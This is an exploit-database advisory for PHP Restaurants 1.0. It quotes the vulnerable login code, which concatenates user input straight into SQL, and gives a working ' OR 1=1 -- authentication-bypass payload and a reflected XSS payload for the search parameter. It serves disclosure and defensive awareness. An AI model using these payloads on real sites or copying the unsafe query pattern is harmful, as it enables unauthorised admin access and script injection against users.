PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS)

vendor:

PHP Restaurants

by:

Or4nG.M4n

7.4

CVSS

HIGH

SQL Injection & Cross Site Scripting (XSS)

CWE

Product Name: PHP Restaurants

Affected Version From: 1

Affected Version To: 1

Patch Exists: YES

Related CWE:

CPE: a:jcwebhole:php_restaurants:1.0

Metasploit:

Other Scripts:

Platforms Tested:

2023

PHP Restaurants 1.0 – SQLi Authentication Bypass & Cross Site Scripting (XSS)

A vulnerability exists in the PHP Restaurants 1.0 software, which allows an attacker to bypass authentication and perform Cross Site Scripting (XSS) attacks. The vulnerability is due to the lack of input validation in the login function of the functions.php file. An attacker can exploit this vulnerability by sending a specially crafted request to the login.php page with an email and password parameter containing an SQL injection payload. This will allow the attacker to bypass authentication and gain access to the admin page. Additionally, an attacker can exploit the Cross Site Scripting (XSS) vulnerability by sending a specially crafted request to the index.php page with a search parameter containing an XSS payload. This will allow the attacker to execute malicious JavaScript code in the context of the web browser.

Mitigation:

Input validation should be implemented to prevent SQL injection and Cross Site Scripting (XSS) attacks. Additionally, the application should be updated to the latest version.

Source

Exploit-DB raw data:

# Exploit Title: PHP Restaurants 1.0 - SQLi Authentication Bypass & Cross Site Scripting (XSS)
# Google Dork: None
# Date: 4/26/2023
# Exploit Author: Or4nG.M4n
# Vendor Homepage: https://github.com/jcwebhole
# Software Link: https://github.com/jcwebhole/php_restaurants
# Version: 1.0


functions.php

function login(){
global $conn;
$email = $_POST['email'];
$pw = $_POST['password'];

$sql = "SELECT * FROM `users` WHERE `email` = '".$email."' AND `password` =
'".md5($pw)."'"; <-- there is No filter to secure sql query
parm[email][password]
$result = $conn->query($sql);
if ($result->num_rows > 0) {
while($row = $result->fetch_assoc()) {
setcookie('uid', $row['id'], time() + (86400 * 30), "/"); // 86400 = 1 day
header('location: index.php');
}
} else {
header('location: login.php?m=Wrong Password');
}

}

login bypass at admin page /rest1/admin/login.php

email & password : ' OR 1=1 --             <- add [space] end of the payload

cross site scripting main page /index.php

xhttp.open("GET", "functions.php?f=getRestaurants<?php
  if(isset($_GET['search'])) echo '&search='.$_GET['search']; <-- here we
can insert our xss payload
?>
  ", true);
xhttp.send();

</script> <-- when you insert your'e payload don't forget to add </script>
like

xss payload : </script><img onerror=alert(1) src=a>